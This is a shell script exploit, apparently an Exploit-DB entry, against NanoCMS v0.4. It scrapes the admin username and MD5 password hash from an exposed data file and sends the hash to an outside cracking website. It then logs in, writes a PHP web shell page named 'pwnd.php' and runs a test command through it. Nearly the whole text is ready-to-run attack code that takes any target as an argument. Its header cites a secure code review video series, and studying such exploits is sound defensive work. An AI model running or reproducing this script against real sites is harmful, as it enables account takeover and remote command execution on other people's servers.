nanocms-exploit.sh

#!/bin/sh
# Exploit Title: NanoCMS v0.4 - Authentication bypass and remote code execution
# Exploit Author: Wireghoul - www.justanotherhacker.com
# Vendor Homepage: https://github.com/kalyan02/NanoCMS
# Version: NanoCMS v0.4
# Related: https://www.exploit-db.com/exploits/50997

# Description:
# This exploits abuses an info leak to get the admin username and raw md5 admin password hash
# It then authenticates and writes a simple php shell to a page
# You can then execute commands by accessing the written page directly
# The code review and exploit creation process is explained in video in the following youtube series on improving seceure code review:
# https://www.youtube.com/watch?v=zK3rQZKBbao&list=PLX4zycADv4BfavtEWSMLh-6gTOgG3LTm-

# Greets: The usual aussie infosec crowd! Hack the Planet!

TARG=$1
USER=`curl -s $TARG/data/pagesdata.txt | grep --colour=never -oE 'username";s:[^;]+";'| sed -e's/..$//' -e's/.*"//'`
MD5S=`curl -s $TARG/data/pagesdata.txt | grep --colour=never -oE 'password";s:[^;]+";'| sed -e's/..$//' -e's/.*"//'`


PASS=`curl -s "https://hashdecryption.com/decrypt.php?str=$MD5S&send=Submit" | grep Decrypted | sed -e's/.*is <b>//' -e's/<.*//'`

echo $USER $PASS

SESS=`curl -s -i -d "user=$USER&pass=$PASS" "$TARG/data/nanoadmin.php" | grep -oE 'PHPSESSID=.*;'`

echo $SESS

curl -s -d 'save=1&content=<?=`$_GET[c]`;?>&title=pwnd' -H "Cookie: $SESS" "$TARG/data/nanoadmin.php?action=addpage" > /dev/null

echo "Shell at $TARG/data/pages/pwnd.php?c=<command>"
curl -s "$TARG/data/pages/pwnd.php?c=id"